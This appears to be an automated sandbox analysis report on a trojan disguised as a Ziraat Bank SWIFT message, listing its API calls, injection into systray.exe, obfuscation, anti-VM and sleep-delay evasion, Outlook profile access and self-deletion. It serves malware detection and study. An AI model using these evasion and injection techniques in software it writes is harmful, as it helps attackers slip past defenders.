Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9A20 NtResumeThread,LdrInitializeThunk, 6_2_012B9A20
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9A00 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_012B9A00
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9A50 NtCreateFile,LdrInitializeThunk, 6_2_012B9A50
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9540 NtReadFile,LdrInitializeThunk, 6_2_012B9540
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B95D0 NtClose,LdrInitializeThunk, 6_2_012B95D0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9710 NtQueryInformationToken,LdrInitializeThunk, 6_2_012B9710
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B97A0 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_012B97A0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9780 NtMapViewOfSection,LdrInitializeThunk, 6_2_012B9780
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9FE0 NtCreateMutant,LdrInitializeThunk, 6_2_012B9FE0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9660 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_012B9660
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B96E0 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_012B96E0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9950 NtQueueApcThread, 6_2_012B9950
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B99D0 NtCreateProcessEx, 6_2_012B99D0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9820 NtEnumerateKey, 6_2_012B9820
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012BB040 NtSuspendThread, 6_2_012BB040
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B98A0 NtWriteVirtualMemory, 6_2_012B98A0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9B00 NtSetValueKey, 6_2_012B9B00
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012BA3B0 NtGetContextThread, 6_2_012BA3B0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9A10 NtQuerySection, 6_2_012B9A10
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9A80 NtOpenDirectoryObject, 6_2_012B9A80
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9520 NtWaitForSingleObject, 6_2_012B9520
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012BAD30 NtSetContextThread, 6_2_012BAD30
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9560 NtWriteFile, 6_2_012B9560
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B95F0 NtQueryInformationFile, 6_2_012B95F0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9730 NtQueryVirtualMemory, 6_2_012B9730
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012BA710 NtOpenProcessToken, 6_2_012BA710
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9760 NtOpenProcess, 6_2_012B9760
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012BA770 NtOpenThread, 6_2_012BA770
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9770 NtSetInformationFile, 6_2_012B9770
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9610 NtEnumerateValueKey, 6_2_012B9610
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9670 NtQueryInformationProcess, 6_2_012B9670
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9650 NtQueryValueKey, 6_2_012B9650
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B96D0 NtCreateKey, 6_2_012B96D0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0041E057 NtAllocateVirtualMemory, 6_2_0041E057
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_004012AC NtProtectVirtualMemory, 6_2_004012AC
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0041DE77 NtCreateFile, 6_2_0041DE77
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0041DF27 NtReadFile, 6_2_0041DF27
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0041DFA7 NtClose, 6_2_0041DFA7
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_004014E9 NtProtectVirtualMemory, 6_2_004014E9
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0041DFA1 NtClose, 6_2_0041DFA1
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000000.289716737.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamebqbz.exe< vs Ziraat Bankasi Swift Mesaji20221129-34221.exe
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.338665766.0000000007830000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameCollins.dll8 vs Ziraat Bankasi Swift Mesaji20221129-34221.exe
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.331494195.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCollins.dll8 vs Ziraat Bankasi Swift Mesaji20221129-34221.exe
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.338561208.00000000076C0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamePrecision.dll6 vs Ziraat Bankasi Swift Mesaji20221129-34221.exe
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.338627282.00000000076E0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameInspector.dllN vs Ziraat Bankasi Swift Mesaji20221129-34221.exe
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.329721340.0000000003121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePrecision.dll6 vs Ziraat Bankasi Swift Mesaji20221129-34221.exe
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.329721340.0000000003121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameInspector.dllN vs Ziraat Bankasi Swift Mesaji20221129-34221.exe
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000006.00000002.453382489.000000000136F000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Ziraat Bankasi Swift Mesaji20221129-34221.exe
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000006.00000003.328808477.00000000011D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Ziraat Bankasi Swift Mesaji20221129-34221.exe
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000006.00000003.318980299.000000000102D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Ziraat Bankasi Swift Mesaji20221129-34221.exe
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe Binary or memory string: OriginalFilenamebqbz.exe< vs Ziraat Bankasi Swift Mesaji20221129-34221.exe
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe Virustotal: Detection: 44%
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Ziraat Bankasi Swift Mesaji20221129-34221.exe.log Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe File created: C:\Users\user\AppData\Local\Temp\q3W1-4699 Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@4/4
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, rvdJXTHHMJjcnIgtsf/J5dcUKfIRNXI7lm7dD.cs Cryptographic APIs: 'CreateDecryptor'
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wntdll.pdbUGP source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000006.00000002.451564221.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000006.00000003.323677233.00000000010BA000.00000004.00000800.00020000.00000000.sdmp, systray.exe, 0000000A.00000003.450849283.0000000000CEA000.00000004.00000800.00020000.00000000.sdmp, systray.exe, 0000000A.00000003.453208658.0000000004434000.00000004.00000800.00020000.00000000.sdmp, systray.exe, 0000000A.00000002.562757134.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, systray.exe, 0000000A.00000002.563719254.00000000046EF000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000006.00000002.451564221.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000006.00000003.323677233.00000000010BA000.00000004.00000800.00020000.00000000.sdmp, systray.exe, 0000000A.00000003.450849283.0000000000CEA000.00000004.00000800.00020000.00000000.sdmp, systray.exe, 0000000A.00000003.453208658.0000000004434000.00000004.00000800.00020000.00000000.sdmp, systray.exe, 0000000A.00000002.562757134.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, systray.exe, 0000000A.00000002.563719254.00000000046EF000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: bqbz.pdb source: Ziraat Bankasi Swift Mesaji20221129-34221.exe

Data Obfuscation

Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, rvdJXTHHMJjcnIgtsf/J5dcUKfIRNXI7lm7dD.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 2_2_05493A68 push eax; retf 2_2_05493A69
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 2_2_05FEAFB0 push esp; ret 2_2_05FEAFB1
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012CD0D1 push ecx; ret 6_2_012CD0E4
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0042106C push eax; ret 6_2_004210BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_004210C2 push eax; ret 6_2_00421129
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_004210B9 push eax; ret 6_2_004210BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_00421123 push eax; ret 6_2_00421129
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_004059B6 push cs; ret 6_2_004059B7
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0040EA2F push eax; retf 6_2_0040EA37
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0041ABC4 push ss; iretd 6_2_0041ABC5
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0041AD59 push esp; iretd 6_2_0041AD5A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_004215D0 push esp; iretd 6_2_004215D2
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_00419D81 push ebx; ret 6_2_00419D82
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_00409EC0 push ds; ret 6_2_00409EC8
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_004226F0 push dword ptr [65B62A56h]; ret 6_2_00422711
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_00419F6C push eax; ret 6_2_00419F6D
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_004227C2 push es; ret 6_2_004227C3
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_004057C5 push FFFFFFB8h; ret 6_2_004057D3
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_00416FCD push ecx; retf 6_2_00416FD1
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe Static PE information: 0xE3C25DA2 [Thu Feb 1 10:59:46 2091 UTC]
Source: initial sample Static PE information: section name: .text entropy: 7.8163399193374055
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, rvdJXTHHMJjcnIgtsf/YXRV9TApsNT67iKaBw.cs High entropy of concatenated method names: '.ctor', 'uGOSjWMqNH', 'IBUSeSKhj0', 'X0kSZbN7xv', 'nMVSP6QvSa', 'tYCSx7Lt3j', 'nqGSidN1s5', 'AhESKnKTPM', 'XhDS1vn1UD', 'UuUSU6EiRK'
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, rvdJXTHHMJjcnIgtsf/jHvRSISRVtEBKE5hkd.cs High entropy of concatenated method names: '.ctor', 'rvdHJXTHM', 'rjcSnIgts', 'oyHlvRSIR', 'TtEFBKE5h', 'YdhdWlURT', 'MXxbIEjbu', 'uq6A1227k', 'XSDcWsWCg', 'YyfEteKw6'
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, rvdJXTHHMJjcnIgtsf/oF02kT8jKxIU4FpGsQ.cs High entropy of concatenated method names: '.ctor', 'j3vlzpxWek', 'gBpFB0lDdx', 'YUeFHVXI8m', 'G1MFSDMhol', 'xLrFlj4f52', 'nsEFFdvqCd', 'D15Fd8nxdi', 'LSTFbPIN6o', 'Fj2FAXAcwt'
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, rvdJXTHHMJjcnIgtsf/cU5CDJYi4Q3OdAemtw.cs High entropy of concatenated method names: 'svudv70r1h', 'tESdaA9RQk', 'NoEdnQ0rkj', '.ctor', 'kLjw4iIsCLsZtxc4lksN0j', '.cctor', 'wBkaDOpCvpSenq9bIw', 'GLaTO2SeADNRU8BDMm', 'eN9e2th5TMYiSEOxoV', 'EvgPDRlqNgYjkkZXqo'
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, rvdJXTHHMJjcnIgtsf/J5dcUKfIRNXI7lm7dD.cs High entropy of concatenated method names: '.cctor', 'J8v8c6oAg9DTf', 'h8iFgq2Epl', 'EHlFt9kOdO', 'LDNFRwCmFY', 'fATF592Wvm', 'y9yFTed8Pp', 'g6OFOM2F3k', 'T1xFs7w6U3', 'bKSFIga2hn'

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\systray.exe File deleted: c:\users\user\desktop\ziraat bankasi swift mesaji20221129-34221.exe Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: Yara match File source: 2.2.Ziraat Bankasi Swift Mesaji20221129-34221.exe.31854c4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Ziraat Bankasi Swift Mesaji20221129-34221.exe.3169a9c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.331328236.0000000003337000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.329721340.0000000003121000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Ziraat Bankasi Swift Mesaji20221129-34221.exe PID: 3176, type: MEMORYSTR
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.331328236.0000000003337000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.329721340.0000000003121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.331328236.0000000003337000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.329721340.0000000003121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe TID: 4620 Thread sleep time: -38122s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe TID: 5324 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\systray.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01345BA5 rdtsc 6_2_01345BA5
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe API coverage: 8.1 %
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Thread delayed: delay time: 38122 Jump to behavior
Source: explorer.exe, 00000007.00000000.350388254.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000007.00000000.383069903.000000000834F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
Source: explorer.exe, 00000007.00000000.398658481.00000000059F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.329721340.0000000003121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000007.00000000.350827572.0000000008394000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.329721340.0000000003121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000007.00000000.411917185.000000000CDC8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&
Source: explorer.exe, 00000007.00000000.350388254.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.329721340.0000000003121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.329721340.0000000003121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01294120 mov eax, dword ptr fs:[00000030h] 6_2_01294120
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01294120 mov ecx, dword ptr fs:[00000030h] 6_2_01294120
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A513A mov eax, dword ptr fs:[00000030h] 6_2_012A513A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01279100 mov eax, dword ptr fs:[00000030h] 6_2_01279100
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127C962 mov eax, dword ptr fs:[00000030h] 6_2_0127C962
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127B171 mov eax, dword ptr fs:[00000030h] 6_2_0127B171
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127B171 mov eax, dword ptr fs:[00000030h] 6_2_0127B171
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129B944 mov eax, dword ptr fs:[00000030h] 6_2_0129B944
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129B944 mov eax, dword ptr fs:[00000030h] 6_2_0129B944
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F69A6 mov eax, dword ptr fs:[00000030h] 6_2_012F69A6
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A61A0 mov eax, dword ptr fs:[00000030h] 6_2_012A61A0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A61A0 mov eax, dword ptr fs:[00000030h] 6_2_012A61A0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F51BE mov eax, dword ptr fs:[00000030h] 6_2_012F51BE
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F51BE mov eax, dword ptr fs:[00000030h] 6_2_012F51BE
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F51BE mov eax, dword ptr fs:[00000030h] 6_2_012F51BE
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F51BE mov eax, dword ptr fs:[00000030h] 6_2_012F51BE
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012999BF mov ecx, dword ptr fs:[00000030h] 6_2_012999BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012999BF mov ecx, dword ptr fs:[00000030h] 6_2_012999BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012999BF mov eax, dword ptr fs:[00000030h] 6_2_012999BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012999BF mov ecx, dword ptr fs:[00000030h] 6_2_012999BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012999BF mov ecx, dword ptr fs:[00000030h] 6_2_012999BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012999BF mov eax, dword ptr fs:[00000030h] 6_2_012999BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012999BF mov ecx, dword ptr fs:[00000030h] 6_2_012999BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012999BF mov ecx, dword ptr fs:[00000030h] 6_2_012999BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012999BF mov eax, dword ptr fs:[00000030h] 6_2_012999BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012999BF mov ecx, dword ptr fs:[00000030h] 6_2_012999BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012999BF mov ecx, dword ptr fs:[00000030h] 6_2_012999BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012999BF mov eax, dword ptr fs:[00000030h] 6_2_012999BF
